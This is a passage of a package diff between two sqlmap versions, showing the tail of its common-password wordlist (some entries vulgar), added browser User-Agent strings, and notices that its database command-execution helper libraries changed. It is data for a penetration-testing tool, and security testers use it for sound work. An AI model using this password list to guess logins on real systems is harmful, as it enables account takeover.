+spaceman spain +spam +spanish +spank +spanker +spanking +spankme spanky +spanner sparkle +sparkles sparks sparky -Sparky +sparky1 sparrow sparrows +sparta spartan +spartan1 +spartans +spawn spazz speaker +speakers +spears special +specialk +spectre spectrum +speed speedo +speedway speedy -Speedy +spence spencer +spencer1 +sperma +sphinx sphynx +spice spider +spider1 spiderma spiderman +spidey spierson spike spike1 +spiker +spikes +spikey +spinner +spiral spirit spit spitfire +splash +spliff +splinter spock +spoiled sponge +spongebo +spooge spooky spoon +spoons +sport +sporting sports +sporty spot +spotty +spread spring springer +springs +sprint +sprinter sprite sprocket +sprout +spud spunky spurs +spurs1 +sputnik +spyder sql sqlexec +squall +square squash +squeak +squeeze squires squirrel squirt srinivas ssp sss +ssss +sssss ssssss +sssssss +ssssssss stacey staci stacie stacy +stafford +stalin stalker +stallion stan standard +stanford +stang stanley +staples star star69 starbuck +starcraf starcraft stardust +starfire starfish stargate +starligh starlight +starman +starr stars +starship +starstar start +start1 starter startrek starwars +state +static station +status +stayout stealth steel steele +steeler steelers stefan +stefanie +stefano +steffen +steffi stella +stellar steph steph1 +stephan +stephane stephani stephanie stephen +stephen1 stephi +stereo sterling -Sterling steve steve1 steven -Steven steven1 stevens +stevie stewart +stick +stickman +sticks sticky +stiffy stimpy sting sting1 +stinger stingray +stinker stinky stivers +stock +stocking stocks +stockton +stolen stone +stone1 +stonecol +stonecold +stoned +stoner stones +stoney +stop storage +store +stories storm +storm1 stormy +straight +strange stranger strangle +strap strat +strat_passwd stratford strato -strat_passwd +stratus +strawber strawberry +stream +streaming street +streets +strength +stress stretch +strider strike +striker +string +strip +stripper +stroke +stroker strong +stryker stuart +stubby stud student student2 studio +studly +studman +stuff stumpy +stunner stupid +stupid1 stuttgart +style +styles +stylus +suan +subaru sublime +submit +suburban subway +subzero success +success1 +suck +suckdick +sucked sucker +suckers +sucking suckit suckme +sucks sudoku sue sugar +sugar1 +suicide sullivan sultan summer -Summer summer1 +summer69 +summer99 +summers summit sumuinen sun sunbird sundance sunday +sundevil sunfire +sunflowe sunflower +sunlight sunny sunny1 +sunnyday sunrise sunset sunshine -Sunshine super +super1 +superb superfly +superior superman -Superman superman1 +supernov supersecret +supersta superstage superstar superuser @@ -4360,294 +8320,532 @@ support supported supra +supreme surf surfer surfing +survivor susan susan1 susana susanna susanne +sushi susie sutton suzanne suzie suzuki suzy -Sverige svetlana +swallow swanson swearer sweden +swedish sweet +sweet1 sweetheart sweetie +sweetnes +sweetness sweetpea +sweets sweety swim swimmer swimming +swinger +swingers +swinging +switch switzer -Swoosh +swoosh +sword swordfis swordfish +swords swpro swuser sybil sydney +sylveste sylvester sylvia sylvie symbol symmetry sympa +synergy +syracuse sys +sys_stnt sysadm sysadmin sysman syspass -sys_stnt system system5 systempass +systems +syzygy +t-bone tab +tabasco tabatha +tabitha +taco tacobell +tacoma taffy tahiti taiwan +talbot +talisman +talks talon tamara tami tamie tammy tamtam +tang tangerine tango +tank +tanker tanner +tantra tanya +tanya1 tapani tape tara +tardis targas target tarheel +tarheels +tarpon tarragon +tartar tarzan tasha +tasha1 tata +tatiana tattoo taurus -Taurus +taxman taylor -Taylor taylor1 tazdevil +tazman +tazmania tbird -t-bone +tbone tdos_icsap teacher +team tech +technics techno tectec teddy teddy1 +teddybea teddybear +teen +teenage teens teflon tekila +tekken telecom +telefon telefono +telephon telephone temp temp! temp123 +tempest +templar +temple temporal temporary +temppass temptation temptemp +tenchi +tender tenerife +teng +tennesse tennis -Tennis tequiero tequila +terefon teresa terminal +terminat terminator +terra +terrapin +terrell +terror terry terry1 test test! test1 +test12 test123 +test1234 test2 test3 +test_user tester testi testing +testing1 testpass testpilot testtest -test_user +tetsuo texas +texas1 thailand +thanatos +thanks thankyou the +theater theatre +thebear thebest theboss +thecat +thecrow +thecure +thedog +thedon +thedoors +thedude theend +theforce +thegame +thegreat +their thejudge +thekid theking +thelma thelorax theman theodore +theone +there theresa -Theresa therock +therock1 +these +thesims +thethe +thewho +thierry +thing thinsamplepw +thirteen +this thisisit thomas -Thomas +thomas1 thompson +thong +thongs +thor thorne thrasher +three +threesom +throat +thuglife +thumb +thumbs thumper thunder -Thunder +thunder1 +thunderb thunderbird thursday thx1138 +tian +tiao tibco +tiberius +tiburon +ticket +tickle tierno tiffany +tiffany1 tiger +tiger1 +tiger123 tiger2 +tigercat tigers +tigers1 tigger -Tigger tigger1 +tigger2 +tight tightend +tights tigre tika tim timber time +timeout +timmy timosha timosha123 timothy +timtim tina +ting tinker +tinkerbe tinkerbell +tinman tintin +tiny tip37 +tipper +titan titanic +titanium +titans titimaman +titleist titouf59 tits +titten +titts +titty tivoli tnt +toast +toaster tobias toby today +todd +toejam +toffee +together toggle +toilet tokyo +toledo +tolkien tom +tomahawk +tomas tomato tomcat +tommie tommy +tommy1 +tommyboy +tomorrow tomtom +tong +tongue +tonight tony +toocool tool +toolbox +toolman +toon +toonarmy +tootie tootsie topcat +topdog topgun +tophat topher topography +topper +toriamos +torino tornado toronto +torpedo +torres tortoise toshiba +tosser total +toto toto1 tototo +tottenha +tottenham toucan +touching +tower +towers +town toxic toyota trace +tracer +tracey traci tracie +track +tracker +tractor tracy +trader +traffic +trailer trails +train +trainer training +trains +trance +tranny +trans +transam transfer transit transport trapper trash +trauma travel +traveler travis tre treasure +treble trebor tree +treefrog trees +treetop trek trevor +trial +triangle +tribal tricia tricky trident trigger trinidad +trinitro trinity +trip +triple +tripleh +tripod +tripper trish trisha tristan triton +triumph trivial trixie trojan +trojans +troll trombone trooper trophy +tropical trouble +trouble1 trout +troy truck trucker +trucking +trucks truelove truman trumpet +trunks +trust +trustme trustno1 +truth tsdev +tsunami tsuser +tttttt +tttttttt tty +tuan tubas tucker tucson tuesday -Tuesday tula +tulips +tuna +tunafish +tundra +tupac turbine turbo +turbo1 turbo2 turkey turner +turnip turtle +tuscl tuttle tweety tweety1 +twelve +twenty +twiggy twilight +twinkie +twinkle twins +twisted twister twitter tybnoq +tycoon tyler tyler1 +typhoon +tyrone +tyson +tyson1 +ultima ultimate +ultra um_admin um_client +umbrella umesh +umpire undead +underdog +undertak undertaker underworld unhappy @@ -4656,15 +8854,22 @@ unique united unity +universa universal universe universidad +university unix unknown +unreal upsilon +uptown +upyours uranus urchin ursula +usa123 +usarmy user user0 user1 @@ -4676,14 +8881,20 @@ user7 user8 user9 -Usuckballz1 +username +usmarine +usmc +usnavy util utility utlestat utopia uucp +uuuuuu vacation vader +vader1 +vagabond vagina val valencia @@ -4691,57 +8902,90 @@ valentina valentinchoque valentine +valeria valerie valeverga valhalla +valkyrie valley vampire +vampires +vancouve vanessa +vanessa1 +vanguard +vanhalen vanilla vasant +vauxhall vea +vector +vectra vedder +vegas vegeta +vegitto veh velo +velocity velvet venice +venom +ventura +venture venus veracruz +verbatim veritas +verizon vermont -Vernon +vernon +verona veronica +veronika +versace vertex_login vertigo vette vfhbyf vfrcbv +vh5150 +viagra vicki +vickie vicky victor victor1 victoria -Victoria victory video videouser +vienna +vietnam +viewsoni vif_dev_pwd viking vikings +vikings1 vikram +villa village vincent -Vincent vincent1 +vinnie +vintage violet violin viper viper1 +vipergts +vipers virago virgil virgin virginia +virginie +virtual virus viruser visa @@ -4750,164 +8994,303 @@ visual vivian vladimir +vodka volcano +volcom +volkswag volley +volleyba +volume volvo voodoo vortex voyager +voyager1 +voyeur vrr1 vrr2 +vsegda +vulcan +vvvv +vvvvvv +waffle +wagner waiting walden waldo walker wallace +wallet walleye wally +walmart +walnut +walrus walter +walton +wanderer +wang wanker +wanking +wanted warcraft +wareagle +warez wargames +warhamme warlock +warlord warner +warning warren warrior +warrior1 warriors +warthog +wasabi +washburn +washingt washington +wasser +wassup +wasted +watch +watcher water water1 -Waterloo +waterboy +waterloo +waters +watford watson wayne wayne1 +wealth +wearing weasel +weather +weaver web +webber webcal01 webdb +webmaste webmaster webread webster -Webster +wedding wedge +weed +weed420 +weekend weenie weezer +weiner +weird welcome welcome1 welcome123 +welder wendi wendy wendy1 +weng +werder +werdna werewolf +werner +wert wesley west western +westham +weston westside +westwood +wetpussy +wetter wfadmin +wg8e3wjf wh whale1 +what whatever whatnot +whatsup +whatthe +whatwhat wheels +whiplash +whiskers +whiskey whisky +whisper +whistler whit white +white1 +whiteboy +whiteout +whitesox +whitey whiting whitney whocares wholesale +whore whoville +whynot wibble wicked +widget wiesenhof +wifey wilbur +wild +wildbill +wildcard wildcat wildcats +wilder +wildfire +wildman +wildone +wildwood will william william1 williams williamsburg willie +willis willow -Willow willy wilma wilson win95 wind +windmill window windows -Windows +windsor windsurf +winger +wingman +wingnut +wings winner +winner1 +winners winnie -Winnie winniethepooh winona winston +winston1 winter +winter1 wip +wireless wisconsin wisdom +wiseguy +wishbone +wives wizard +wizard1 +wizards +wk_test wkadmin wkproxy wksys -wk_test wkuser wms wmsys wob wolf wolf1 +wolf359 +wolfen wolfgang +wolfie +wolfman +wolfpac wolfpack wolverin wolverine -Wolverine wolves +woman wombat wombat1 women wonder +wonderboy wood -Woodrow +woodie +woodland +woodstoc woodwind woody +woody1 +woofer woofwoof +woohoo +wookie +woowoo word wordpass +wordup work work123 +working +workout world -World wormwood worship +worthy +wowwow wps +wraith wrangler +wrench +wrestle +wrestler +wrestlin wrestling wright +wrinkle1 writer writing wsh wsm +wutang www wwwuser +wwww +wwwwww +wwwwwww +wwwwwwww +wxcvbn wyoming +x-files +x-men xademo xanadu +xander xanth xavier xcountry xdp +xerxes xfer xfiles -x-files +xian +xiang +xiao ximena ximenita +xing +xiong xla -x-men xmodem xnc xni @@ -4916,11 +9299,14 @@ xns xprt xtr +xtreme +xuan xxx xxx123 xxxx xxxxx xxxxxx +xxxxxxx xxxxxxxx xyz xyz123 @@ -4928,62 +9314,126 @@ y yaco yamaha +yamahar1 +yamato yang yankee yankees yankees1 +yankees2 +yasmin +yaya +yeah +yeahbaby yellow yellowstone yes yeshua +yessir +yesyes yfnfif +ying yoda yogibear yolanda yomama +yong yosemite yoteamo young +young1 your_pass +yourmom +yousuck +yoyo +yoyoma +yoyoyo ysrmma +ytrewq +yuan yukon +yummy +yumyum yvette yvonne +yyyy +yyyyyy +yyyyyyyy +yzerman zachary +zachary1 zack +zander +zang +zanzibar zap zapata zapato zaphod +zappa +zapper +zaq123 zaq12wsx +zaq1xsw2 +zaqwsx +zaqxsw zebra zebras +zeng zenith zephyr zeppelin zepplin +zero +zerocool zeus +zhai +zhang +zhao +zhei +zheng +zhong zhongguo +zhou +zhuai +zhuang +zhui +zhun +zhuo +zidane ziggy zigzag +zildjian zimmerman +zipper +zippo +zippy zirtaeb zmodem +zodiac zoltan zombie +zong zoomer zorro +zouzou +zuan zwerg zxc zxc123 zxccxz +zxcv zxcvb -Zxcvb zxcvbn zxcvbnm -Zxcvbnm +zxcvbnm1 zxcxz zxczxc +zxzxzx zzz +zzzxxx +zzzz zzzzz zzzzzz +zzzzzzz +zzzzzzzz diff -Nru sqlmap-1.4.4/data/txt/user-agents.txt sqlmap-1.5.11.5/data/txt/user-agents.txt --- sqlmap-1.4.4/data/txt/user-agents.txt 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/data/txt/user-agents.txt 2021-11-12 18:30:56.000000000 +0000 @@ -1,4 +1,4 @@ -# Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/) +# Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) # See the file 'LICENSE' for copying permission # Opera @@ -4183,3 +4183,92 @@ Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-TW) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 Mozilla/5.0 (X11; U; Linux x86_64; en-ca) AppleWebKit/531.2+ (KHTML, like Gecko) Version/5.0 Safari/531.2+ Mozilla/5.0 (X11; U; Linux x86_64; en-us) AppleWebKit/531.2+ (KHTML, like Gecko) Version/5.0 Safari/531.2+ + +# https://techblog.willshouse.com/2012/01/03/most-common-user-agents/ (Note: Updated December 28th 2020) + +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.1 Safari/605.1.15 +Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 +Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0 +Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.2 Safari/605.1.15 +Mozilla/5.0 (X11; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.1 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60 +Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.66 +Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.57 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.101 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:83.0) Gecko/20100101 Firefox/83.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 OPR/72.0.3815.400 +Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36 Edg/87.0.664.47 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36 Edg/87.0.664.55 +Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36 Edg/87.0.664.52 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.2 Safari/605.1.15 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0 +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 OPR/72.0.3815.400 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:84.0) Gecko/20100101 Firefox/84.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.1 Safari/605.1.15 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko +Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.92 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:83.0) Gecko/20100101 Firefox/83.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36 OPR/72.0.3815.320 +Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0 +Mozilla/5.0 (X11; Linux x86_64; rv:82.0) Gecko/20100101 Firefox/82.0 +Mozilla/5.0 (Linux; U; Android 4.3; en-us; SM-N900T Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 +Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0 +Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 +Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 +Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:84.0) Gecko/20100101 Firefox/84.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 OPR/73.0.3856.284 Binary files /tmp/tmpflscm4dw/b5OpNKisXF/sqlmap-1.4.4/data/txt/wordlist.tx_ and /tmp/tmpflscm4dw/bGnUAgkDIX/sqlmap-1.5.11.5/data/txt/wordlist.tx_ differ Binary files /tmp/tmpflscm4dw/b5OpNKisXF/sqlmap-1.4.4/data/udf/mysql/linux/32/lib_mysqludf_sys.so_ and /tmp/tmpflscm4dw/bGnUAgkDIX/sqlmap-1.5.11.5/data/udf/mysql/linux/32/lib_mysqludf_sys.so_ differ Binary files /tmp/tmpflscm4dw/b5OpNKisXF/sqlmap-1.4.4/data/udf/mysql/linux/64/lib_mysqludf_sys.so_ and /tmp/tmpflscm4dw/bGnUAgkDIX/sqlmap-1.5.11.5/data/udf/mysql/linux/64/lib_mysqludf_sys.so_ differ Binary files /tmp/tmpflscm4dw/b5OpNKisXF/sqlmap-1.4.4/data/udf/mysql/windows/32/lib_mysqludf_sys.dll_ and /tmp/tmpflscm4dw/bGnUAgkDIX/sqlmap-1.5.11.5/data/udf/mysql/windows/32/lib_mysqludf_sys.dll_ differ Binary files /tmp/tmpflscm4dw/b5OpNKisXF/sqlmap-1.4.4/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_ and /tmp/tmpflscm4dw/bGnUAgkDIX/sqlmap-1.5.11.5/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_ differ Binary files /tmp/tmpflscm4dw/b5OpNKisXF/sqlmap-1.4.4/data/udf/postgresql/linux/32/10/lib_postgresqludf_sys.so_ and /tmp/tmpflscm4dw/bGnUAgkDIX/sqlmap-1.5.11.5/data/udf/postgresql/linux/32/10/lib_postgresqludf_sys.so_ differ Binary files /tmp/tmpflscm4dw/b5OpNKisXF/sqlmap-1.4.4/data/udf/postgresql/linux/32/11/lib_postgresqludf_sys.so_ and /tmp/tmpflscm4dw/bGnUAgkDIX/sqlmap-1.5.11.5/data/udf/postgresql/linux/32/11/lib_postgresqludf_sys.so_ differ Binary files /tmp/tmpflscm4dw/b5OpNKisXF/sqlmap-1.4.4/data/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_ and /tmp/tmpflscm4dw/bGnUAgkDIX/sqlmap-1.5.11.5/data/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_ differ Binary files /tmp/tmpflscm4dw/b5OpNKisXF/sqlmap-1.4.4/data/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_ and /tmp/tmpflscm4dw/bGnUAgkDIX/sqlmap-1.5.11.5/data/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_ differ Binary files /tmp/tmpflscm4dw/b5OpNKisXF/sqlmap-1.4.4/data/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_ and /tmp/tmpflscm4dw/bGnUAgkDIX/sqlmap-1.5.11.5/data/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_ differ Binary files /tmp/tmpflscm4dw/b5OpNKisXF/sqlmap-1.4.4/data/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_ and /tmp/tmpflscm4dw/bGnUAgkDIX/sqlmap-1.5.11.5/data/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_ differ Binary files /tmp/tmpflscm4dw/b5OpNKisXF/sqlmap-1.4.4/data/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_ and /tmp/tmpflscm4dw/bGnUAgkDIX/sqlmap-1.5.11.5/data/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_ differ Binary files /tmp/tmpflscm4dw/b5OpNKisXF/sqlmap-1.4.4/data/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_ and /tmp/tmpflscm4dw/bGnUAgkDIX/sqlmap-1.5.11.5/data/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_ differ Binary files /tmp/tmpflscm4dw/b5OpNKisXF/sqlmap-1.4.4/data/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_ and /tmp/tmpflscm4dw/bGnUAgkDIX/sqlmap-1.5.11.5/data/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_ differ Binary files /tmp/tmpflscm4dw/b5OpNKisXF/sqlmap-1.4.4/data/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_ and /tmp/tmpflscm4dw/bGnUAgkDIX/sqlmap-1.5.11.5/data/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_ differ Binary files /tmp/tmpflscm4dw/b5OpNKisXF/sqlmap-1.4.4/data/udf/postgresql/linux/32/9.5/lib_postgresqludf_sys.so_ and /tmp/tmpflscm4dw/bGnUAgkDIX/sqlmap-1.5.11.5/data/udf/postgresql/linux/32/9.5/lib_postgresqludf_sys.so_ differ Binary files /tmp/tmpflscm4dw/b5OpNKisXF/sqlmap-1.4.4/data/udf/postgresql/linux/32/9.6/lib_postgresqludf_sys.so_ and /tmp/tmpflscm4dw/bGnUAgkDIX/sqlmap-1.5.11.5/data/udf/postgresql/linux/32/9.6/lib_postgresqludf_sys.so_ differ Binary files /tmp/tmpflscm4dw/b5OpNKisXF/sqlmap-1.4.4/data/udf/postgresql/linux/64/10/lib_postgresqludf_sys.so_ and /tmp/tmpflscm4dw/bGnUAgkDIX/sqlmap-1.5.11.5/data/udf/postgresql/linux/64/10/lib_postgresqludf_sys.so_ differ Binary files /tmp/tmpflscm4dw/b5OpNKisXF/sqlmap-1.4.4/data/udf/postgresql/linux/64/11/lib_postgresqludf_sys.so_ and /tmp/tmpflscm4dw/bGnUAgkDIX/sqlmap-1.5.11.5/data/udf/postgresql/linux/64/11/lib_postgresqludf_sys.so_ differ Binary files 